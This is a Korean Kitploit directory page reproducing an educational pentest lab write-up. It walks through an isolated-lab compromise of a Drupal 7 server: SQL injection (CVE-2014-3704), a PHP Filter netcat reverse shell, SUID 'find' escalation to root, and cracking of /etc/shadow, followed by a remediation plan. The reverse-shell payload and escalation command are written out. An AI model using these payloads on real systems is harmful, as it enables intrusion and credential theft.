Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Audit-BlackBox-Web-to-Root — Drupal 7 서버에 대한 Black Box 보안 감사. 전체 Kill Chain 시연: SQL 인젝션(CVE-2014-3704) ➔ RCE ➔ Reverse Shell ➔ Root 권한 상승(SUID). 이 저장소에는 상세 기술 보고서, PoC 악용 증명 및 인프라 보안을 위한 수정 조치가 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/fbm31/audit-blackbox-web-to-root
Password CrackingPrivilege EscalationReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationPenetration TestingCommand and Control

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Learning & Education
Labs & Practice
GitHubfbm31/audit-blackbox-web-to-root

Audit-BlackBox-Web-to-Root

Drupal 7 서버에 대한 Black Box 보안 감사. 전체 Kill Chain 시연: SQL 인젝션(CVE-2014-3704) ➔ RCE ➔ Reverse Shell ➔ Root 권한 상승(SUID). 이 저장소에는 상세 기술 보고서, PoC 악용 증명 및 인프라 보안을 위한 수정 조치가 포함되어 있습니다.

저장소 보기
7개월 전아직 검토되지 않음

Pentest Lab : 웹 및 시스템 공격 체인 (Drupal to Root)

Disclaimer

이 프로젝트는 교육 및 학술 목적으로 통제되고 격리된 실험실 환경에서 수행되었습니다. 실제 인프라는 대상으로 삼지 않았습니다. 목표는 공격 메커니즘을 이해함으로써 시스템을 보호하는 방법을 배우는 것입니다.


작업 환경 및 목표

시나리오

이 프로젝트의 목표는 블랙박스(Black Box) 감사를 수행하는 것입니다. 즉, 분석은 대상에 대한 사전 지식 없이 시작됩니다. 어떠한 식별자, 기술 문서, 소스 코드도 제공되지 않았습니다.

랩 아키텍처

인프라는 외부와의 상호작용을 차단하기 위해 VMware에서 개인 격리 네트워크(Host-Only)로 가상 배포되었습니다.

  • 공격자 머신 (Kali Linux) : 192.168.78.131
    • 도구 : Nmap, Python, Netcat, John the Ripper.
  • 대상 머신 (피해자) : 192.168.78.132
    • OS : Linux (Debian).
    • 초기 상태 : 알 수 없음.

1단계 : 정찰 및 탐색

첫 번째 단계는 포트 스캔을 사용하여 대상 머신의 공격 표면을 매핑하는 것이었습니다.

실행된 명령 : nmap -sV 192.168.78.132

Nmap Scan

식별된 서비스 :

  • 포트 22 (TCP) : SSH (OpenSSH 6.0p1).
  • 포트 80 (TCP) : HTTP 서버 (Apache 2.2.22).
  • 포트 111 (TCP) : rpcbind.

웹 서비스(포트 80)와 robots.txt 파일 분석을 통해 CMS Drupal의 존재가 확인되었습니다. 소스 코드 검사를 통해 구버전인 Drupal 7.x가 식별되었습니다.


취약점 분석

정찰 단계의 결과는 심각한 공격 표면, 즉 관리되지 않는 Drupal 7 CMS를 드러냈습니다. 이 버전은 역사적으로 주요 보안 취약점(특히 "Drupalgeddon")에 취약한 것으로 알려져 있습니다.

이에 따라 감사는 공개 취약점(CVE)에 대한 집중 검색으로 전환되었습니다. 이 열거를 통해 단순 웹 방문자에서 시스템 관리자 "Root"로 전환할 수 있는 완전한 공격 체인이 존재함이 확인되었습니다.

식별된 공격 벡터 :

  1. 웹 : SQL 인젝션 (CVE-2014-3704).
  2. 애플리케이션 : "PHP Filter" 모듈의 잘못된 구성.
  3. 시스템 : 시스템 바이너리의 위험한 SUID 권한.

공격 (Kill Chain)

1단계 : 초기 침투 (SQL 인젝션)

CVE-2014-3704 (Drupalgeddon) 취약점을 악용합니다. Drupal 데이터베이스 API의 이 취약점은 인증 없이 SQL 명령을 주입할 수 있게 합니다.

  • 작업 : users 테이블에 관리자 권한을 가진 새 사용자 주입.
  • 결과 : CMS 관리 패널에 대한 접근 권한 획득.

Exploit SQLi

Python 스크립트 받기

2단계 : 코드 실행 (RCE & Reverse Shell)

관리자로 로그인한 후, 기본 모듈인 PHP Filter를 사용합니다. 이 모듈은 잘못 구성된 경우 사이트 페이지에서 임의의 PHP 코드를 실행할 수 있습니다.

  • Payload : <?php system('nc -e /bin/bash 192.168.78.131 4444'); ?>
  • 결과 : Kali 머신에서 원격 셸 획득 (www-data 사용자).

Reverse Shell

3단계 : 권한 상승 (Root로)

SUID(Set User ID) 권한이 있는 파일을 분석합니다. find 명령에서 심각한 구성이 발견되었습니다.

  • 권한 상승 명령 : find . -exec '/bin/sh' \;
  • 결과 : find 바이너리가 root로 실행되며 Root (uid=0) 권한으로 셸을 실행합니다.

4단계 : 사후 침투

root 접근 권한을 획득한 후, 사용자 비밀번호 해시를 유출하기 위해 민감한 파일 /etc/shadow를 읽습니다.

  • 작업 : John the Ripper를 사용하여 사전 공격으로 SHA-512 해시 크랙.
  • 결과 : 약한 복잡성의 root/사용자 비밀번호를 복구하여 시스템에 지속적인 접근이 가능해짐.

Reverse Shell

요약

감사 결과 위험 수준은 CRITICAL로 나타났습니다. 구식 CMS와 시스템 구성의 부주의(SUID)가 결합되어 서버의 완전한 손상이 가능합니다.

기업에 미치는 영향 :

  • 기밀성 : 고객 데이터베이스 및 시스템 파일(/etc/shadow)의 유출 가능성.
  • 무결성 : 사이트 데이터의 전체 수정 또는 삭제.
  • 가용성 : 서비스 중단 또는 파괴 위험.

우선 조치 계획 :

  1. 업데이트 : SQLi 취약점을 해결하기 위해 Drupal을 최신 안정 버전으로 마이그레이션.
  2. 시스템 강화 : 필수가 아닌 실행 파일에서 SUID 비트 제거 (chmod u-s /usr/bin/find).
  3. 최소 권한 : 엄격히 필요하지 않은 경우 PHP Filter 모듈 비활성화.

문서

전체 기술 세부 사항, 사용된 스크립트 및 심층 분석은 전체 보고서를 참조하십시오 : 감사 보고서 읽기 (PDF)

저자

Fabien MOINE

도구 다운로드